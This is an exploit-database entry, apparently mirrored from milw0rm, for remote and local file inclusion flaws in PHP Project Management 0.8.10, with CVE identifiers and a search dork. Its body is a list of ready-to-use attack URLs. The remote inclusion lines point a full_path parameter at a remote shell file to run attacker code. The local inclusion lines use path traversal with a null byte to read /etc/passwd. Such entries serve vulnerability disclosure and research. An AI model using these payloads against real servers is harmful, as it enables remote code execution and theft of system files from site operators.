[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-10-20 
date_updated: 2016-10-20 
verified: 1 
codes: OSVDB-41975;CVE-2007-5642;OSVDB-41974;OSVDB-41973;OSVDB-41972;OSVDB-41971;CVE-2007-5641;OSVDB-41970;OSVDB-41969;OSVDB-41968;OSVDB-41967;OSVDB-41966;OSVDB-41965;OSVDB-41964;OSVDB-41963;OSVDB-41962;OSVDB-41961;OSVDB-41960;OSVDB-41959;OSVDB-41958;OSVDB-41957;OSVDB-41956;OSVDB-41955;OSVDB-41954;OSVDB-41953;OSVDB-41952;OSVDB-41951;OSVDB-41934;OSVDB-41933;OSVDB-41932;OSVDB-41931;OSVDB-41930;OSVDB-41929;OSVDB-41928;OSVDB-41927;OSVDB-41926;OSVDB-41925;OSVDB-41924;OSVDB-41923;OSVDB-41922;OSVDB-41921;OSVDB-41920;OSVDB-41919;OSVDB-41918;OSVDB-41917;OSVDB-41916;OSVDB-41915;OSVDB-41914;OSVDB-41913;OSVDB-41912;OSVDB-41911;OSVDB-41910;OSVDB-41909;OSVDB-41908;OSVDB-41907;OSVDB-41906;OSVDB-41905 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comrelease-0.8.tar.gz
#  PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities
#  http://surfnet.dl.sourceforge.net/sourceforge/php-pm/release-0.8.tar.gz
#  DORK : "PHP Project Management 0.8.10"
#  POC : RFI
#  /modules/certinfo/index.php?full_path=http://localhost/shell.txt?
#  /modules/emails/index.php?full_path=http://localhost/shell.txt?
#  /modules/events/index.php?full_path=http://localhost/shell.txt?
#  /modules/fax/index.php?full_path=http://localhost/shell.txt?
#  /modules/files/index.php?full_path=http://localhost/shell.txt?
#  /modules/files/list.php?full_path=http://localhost/shell.txt?
#  /modules/groupadm/index.php?full_path=http://localhost/shell.txt?
#  /modules/history/index.php?full_path=http://localhost/shell.txt?
#  /modules/info/index.php?full_path=http://localhost/shell.txt?
#  /modules/log/index.php?full_path=http://localhost/shell.txt?
#  /modules/mail/index.php?full_path=http://localhost/shell.txt?
#  /modules/messages/index.php?full_path=http://localhost/shell.txt?
#  /modules/organizations/index.php?full_path=http://localhost/shell.txt?
#  /modules/phones/index.php?full_path=http://localhost/shell.txt?
#  /modules/presence/index.php?full_path=http://localhost/shell.txt?
#  /modules/projects/index.php?full_path=http://localhost/shell.txt?
#  /modules/projects/summary.inc.php?full_path=http://localhost/shell.txt?
#  /modules/projects/list.php?full_path=http://localhost/shell.txt?
#  /modules/reports/index.php?full_path=http://localhost/shell.txt?
#  /modules/search/index.php?full_path=http://localhost/shell.txt?
#  /modules/snf/index.php?full_path=http://localhost/she ll.txt?
#  /modules/syslog/index.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/searchsimilar.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/index.php?full_path=http://localhost/shell.txt?
#  /modules/tasks/summary.inc.php?full_path=http://localhost/shell.txt?
#  /modules/useradm/index.php?full_path=http://localhost/shell.txt?
#  /ajax/loadsplash.php?full_path=http://localhost/shell.txt?
#  /blocks/birthday.php?full_path=http://localhost/shell.txt?
#  /blocks/events.php?full_path=http://localhost/shell.txt?
#  /blocks/help.php?full_path=http://localhost/shell.txt?
#  POC : LFI
#  /modules/certinfo/index.php?module=../../../../../../etc/passwd%00
#  /modules/emails/index.php?module=../../../../../../etc/passwd%00
#  /modules/events/index.php?module=../../../../../../etc/passwd%00
#  /modules/fax/index.php?module=../../../../../../etc/passwd%00
#  /modules/files/index.php?module=../../../../../../etc/passwd%00
#  /modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
#  /modules/groupadm/index.php?module=../../../../../../etc/passwd%00
#  /modules/history/index.php?module=../../../../../../etc/passwd%00
#  /modules/info/index.php?module=../../../../../../etc/passwd%00
#  /modules/log/index.php?module=../../../../../../etc/passwd%00
#  /modules/mail/index.php?module=../../../../../../etc/passwd%00
#  /modules/messages/index.php?module=../../../../../../etc/passwd%00
#  /modules/organizations/index.php?module=../../../../../../etc/passwd%00
#  /modules/phones/index.php?module=../../../../../../etc/passwd%00
#  /modules/presence/index.php?module=../../../../../../etc/passwd%00
#  /modules/projects/index.php?module=../../../../../../etc/passwd%00
#  /modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
#  /modules/projects/list.php?module=../../../../../../etc/passwd%00
#  /modules/reports/index.php?module=../../../../../../etc/passwd%00
#  /modules/search/index.php?module=../../../../../../etc/passwd%00
#  /modules/snf/index.php?module=../../../../../../etc/passwd%00
#  /modules/syslog/index.php?module=../../../../../../etc/passwd%00
#  /modules/tasks/index.php?module=../../../../../../etc/passwd%00
#  /modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
#  /modules/useradm/index.php?module=../../../../../../etc/passwd%00

# milw0rm.com [2007-10-21]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.